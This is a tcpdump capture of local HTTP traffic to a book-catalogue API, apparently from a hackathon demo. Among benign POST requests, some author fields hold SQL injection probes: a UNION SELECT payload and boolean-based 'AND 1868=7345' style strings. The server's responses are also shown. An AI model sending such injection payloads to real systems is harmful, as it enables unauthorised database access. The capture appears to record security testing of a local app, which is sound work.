22:20:22.619356 IP6 (hlim 64, next-header TCP (6) payload length: 249) ::1.55636 > ::1.8080: Flags [P.], cksum 0x0101 (incorrect -> 0x743c), seq 1:218, ack 1, win 342, options [nop,nop,TS val 9842883 ecr 9842883], length 217: HTTP, length: 217
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 82
	
	{"name":"Hackathon-Demo8","author":"Ramesh UNION ALL SELECT NULL#","price":"9.99"}[!http]
22:20:22.619371 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55636: Flags [.], cksum 0x0028 (incorrect -> 0x4f76), seq 1, ack 218, win 350, options [nop,nop,TS val 9842883 ecr 9842883], length 0
22:20:22.621938 IP6 (hlim 64, next-header TCP (6) payload length: 255) ::1.8080 > ::1.55636: Flags [P.], cksum 0x0107 (incorrect -> 0x7c10), seq 1:224, ack 218, win 350, options [nop,nop,TS val 9842886 ecr 9842883], length 223: HTTP, length: 223
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:20:22 GMT
	
	59
	{"id":195,"name":"Hackathon-Demo8","author":"Ramesh UNION ALL SELECT NULL#","price":9.99}
22:20:22.621956 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55636 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4e91), seq 218, ack 224, win 350, options [nop,nop,TS val 9842886 ecr 9842886], length 0
22:20:22.622195 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55636: Flags [P.], cksum 0x002d (incorrect -> 0x0a6a), seq 224:229, ack 218, win 350, options [nop,nop,TS val 9842886 ecr 9842886], length 5: HTTP
22:20:22.622208 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55636 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4e8c), seq 218, ack 229, win 350, options [nop,nop,TS val 9842886 ecr 9842886], length 0
22:20:22.622316 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55636 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x4e8b), seq 218, ack 229, win 350, options [nop,nop,TS val 9842886 ecr 9842886], length 0
22:20:22.622537 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55636: Flags [F.], cksum 0x0028 (incorrect -> 0x4e8a), seq 229, ack 219, win 350, options [nop,nop,TS val 9842886 ecr 9842886], length 0
22:20:22.622554 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55636 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4e8a), seq 219, ack 230, win 350, options [nop,nop,TS val 9842886 ecr 9842886], length 0
22:20:22.633217 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55638 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x5928), seq 3417396251, win 43690, options [mss 65476,sackOK,TS val 9842897 ecr 0,nop,wscale 7], length 0
22:20:22.633238 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55638: Flags [S.], cksum 0x0030 (incorrect -> 0xa88d), seq 2890257116, ack 3417396252, win 43690, options [mss 65476,sackOK,TS val 9842897 ecr 9842897,nop,wscale 7], length 0
22:20:22.633281 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55638 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7abf), seq 1, ack 1, win 342, options [nop,nop,TS val 9842897 ecr 9842897], length 0
22:20:22.633387 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.55638 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x766c), seq 1:197, ack 1, win 342, options [nop,nop,TS val 9842897 ecr 9842897], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo9","author":"Ramesh-P","price":"9.99"}[!http]
22:20:22.633404 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55638: Flags [.], cksum 0x0028 (incorrect -> 0x79f3), seq 1, ack 197, win 350, options [nop,nop,TS val 9842897 ecr 9842897], length 0
22:20:22.635212 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.55638: Flags [P.], cksum 0x00f2 (incorrect -> 0x9046), seq 1:203, ack 197, win 350, options [nop,nop,TS val 9842899 ecr 9842897], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:20:22 GMT
	
	44
	{"id":196,"name":"Hackathon-Demo9","author":"Ramesh-P","price":9.99}
22:20:22.635258 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55638 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7925), seq 197, ack 203, win 350, options [nop,nop,TS val 9842899 ecr 9842899], length 0
22:20:22.635449 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55638: Flags [P.], cksum 0x002d (incorrect -> 0x34fe), seq 203:208, ack 197, win 350, options [nop,nop,TS val 9842899 ecr 9842899], length 5: HTTP
22:20:22.635495 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55638 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7920), seq 197, ack 208, win 350, options [nop,nop,TS val 9842899 ecr 9842899], length 0
22:20:22.635724 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55638 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x791f), seq 197, ack 208, win 350, options [nop,nop,TS val 9842899 ecr 9842899], length 0
22:20:22.636445 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55638: Flags [F.], cksum 0x0028 (incorrect -> 0x791d), seq 208, ack 198, win 350, options [nop,nop,TS val 9842900 ecr 9842899], length 0
22:20:22.636475 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55638 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x791c), seq 198, ack 209, win 350, options [nop,nop,TS val 9842900 ecr 9842900], length 0
22:20:22.660290 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55640 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x8003), seq 2269999495, win 43690, options [mss 65476,sackOK,TS val 9842924 ecr 0,nop,wscale 7], length 0
22:20:22.660322 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55640: Flags [S.], cksum 0x0030 (incorrect -> 0x978f), seq 4013803426, ack 2269999496, win 43690, options [mss 65476,sackOK,TS val 9842924 ecr 9842924,nop,wscale 7], length 0
22:20:22.660344 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55640 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x69c1), seq 1, ack 1, win 342, options [nop,nop,TS val 9842924 ecr 9842924], length 0
22:20:22.660452 IP6 (hlim 64, next-header TCP (6) payload length: 260) ::1.55640 > ::1.8080: Flags [P.], cksum 0x010c (incorrect -> 0xab23), seq 1:229, ack 1, win 342, options [nop,nop,TS val 9842924 ecr 9842924], length 228: HTTP, length: 228
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 93
	
	{"name":"Hackathon-Demo10","author":"Ramesh %"))) AND 1868=7345 AND ((("%"="","price":"9.99"}[!http]
22:20:22.660469 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55640: Flags [.], cksum 0x0028 (incorrect -> 0x68d5), seq 1, ack 229, win 350, options [nop,nop,TS val 9842924 ecr 9842924], length 0
22:20:22.662664 IP6 (hlim 64, next-header TCP (6) payload length: 124) ::1.8080 > ::1.55640: Flags [P.], cksum 0x0084 (incorrect -> 0x1830), seq 1:93, ack 229, win 350, options [nop,nop,TS val 9842926 ecr 9842924], length 92: HTTP, length: 92
	HTTP/1.1 400 
	Content-Length: 0
	Date: Thu, 27 Jun 2019 22:20:22 GMT
	Connection: close
	
22:20:22.662682 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55640 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x687d), seq 229, ack 93, win 342, options [nop,nop,TS val 9842926 ecr 9842926], length 0
22:20:22.662775 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55640: Flags [F.], cksum 0x0028 (incorrect -> 0x6874), seq 93, ack 229, win 350, options [nop,nop,TS val 9842926 ecr 9842926], length 0
22:20:22.662968 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55640 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x687a), seq 229, ack 94, win 342, options [nop,nop,TS val 9842927 ecr 9842926], length 0
22:20:22.662983 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55640: Flags [.], cksum 0x0028 (incorrect -> 0x6871), seq 94, ack 230, win 350, options [nop,nop,TS val 9842927 ecr 9842927], length 0
22:20:22.675900 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55642 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x47d3), seq 2751171832, win 43690, options [mss 65476,sackOK,TS val 9842939 ecr 0,nop,wscale 7], length 0
22:20:22.675959 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55642: Flags [S.], cksum 0x0030 (incorrect -> 0xbe5f), seq 4093076440, ack 2751171833, win 43690, options [mss 65476,sackOK,TS val 9842940 ecr 9842939,nop,wscale 7], length 0
22:20:22.675989 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55642 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x9090), seq 1, ack 1, win 342, options [nop,nop,TS val 9842940 ecr 9842940], length 0
22:20:22.676101 IP6 (hlim 64, next-header TCP (6) payload length: 229) ::1.55642 > ::1.8080: Flags [P.], cksum 0x00ed (incorrect -> 0x900e), seq 1:198, ack 1, win 342, options [nop,nop,TS val 9842940 ecr 9842940], length 197: HTTP, length: 197
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 62
	
	{"name":"Hackathon-Demo11","author":"Ramesh-P","price":"9.99"}[!http]
22:20:22.676119 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55642: Flags [.], cksum 0x0028 (incorrect -> 0x8fc3), seq 1, ack 198, win 350, options [nop,nop,TS val 9842940 ecr 9842940], length 0
22:20:22.679374 IP6 (hlim 64, next-header TCP (6) payload length: 235) ::1.8080 > ::1.55642: Flags [P.], cksum 0x00f3 (incorrect -> 0x96f8), seq 1:204, ack 198, win 350, options [nop,nop,TS val 9842943 ecr 9842940], length 203: HTTP, length: 203
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:20:22 GMT
	
	45
	{"id":197,"name":"Hackathon-Demo11","author":"Ramesh-P","price":9.99}
22:20:22.679391 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55642 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x8ef2), seq 198, ack 204, win 350, options [nop,nop,TS val 9842943 ecr 9842943], length 0
22:20:22.679647 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55642: Flags [P.], cksum 0x002d (incorrect -> 0x4acb), seq 204:209, ack 198, win 350, options [nop,nop,TS val 9842943 ecr 9842943], length 5: HTTP
22:20:22.679660 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55642 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x8eed), seq 198, ack 209, win 350, options [nop,nop,TS val 9842943 ecr 9842943], length 0
22:20:22.679770 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55642 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x8eec), seq 198, ack 209, win 350, options [nop,nop,TS val 9842943 ecr 9842943], length 0
22:20:22.679909 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55642: Flags [F.], cksum 0x0028 (incorrect -> 0x8eea), seq 209, ack 199, win 350, options [nop,nop,TS val 9842944 ecr 9842943], length 0
22:20:22.679925 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55642 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x8ee9), seq 199, ack 210, win 350, options [nop,nop,TS val 9842944 ecr 9842944], length 0
22:20:22.689802 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55644 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xf460), seq 1213611008, win 43690, options [mss 65476,sackOK,TS val 9842953 ecr 0,nop,wscale 7], length 0
22:20:22.689860 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55644: Flags [S.], cksum 0x0030 (incorrect -> 0x1649), seq 794000660, ack 1213611009, win 43690, options [mss 65476,sackOK,TS val 9842953 ecr 9842953,nop,wscale 7], length 0
22:20:22.689909 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55644 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe879), seq 1, ack 1, win 342, options [nop,nop,TS val 9842954 ecr 9842953], length 0
22:20:22.690020 IP6 (hlim 64, next-header TCP (6) payload length: 259) ::1.55644 > ::1.8080: Flags [P.], cksum 0x010b (incorrect -> 0xd15c), seq 1:228, ack 1, win 342, options [nop,nop,TS val 9842954 ecr 9842953], length 227: HTTP, length: 227
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 92
	
	{"name":"Hackathon-Demo12","author":"Ramesh%"))) AND 3428=3428 AND ((("%"="","price":"9.99"}[!http]
22:20:22.690064 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55644: Flags [.], cksum 0x0028 (incorrect -> 0xe78d), seq 1, ack 228, win 350, options [nop,nop,TS val 9842954 ecr 9842954], length 0
22:20:22.691102 IP6 (hlim 64, next-header TCP (6) payload length: 124) ::1.8080 > ::1.55644: Flags [P.], cksum 0x0084 (incorrect -> 0x96e9), seq 1:93, ack 228, win 350, options [nop,nop,TS val 9842955 ecr 9842954], length 92: HTTP, length: 92
	HTTP/1.1 400 
	Content-Length: 0
	Date: Thu, 27 Jun 2019 22:20:22 GMT
	Connection: close
	
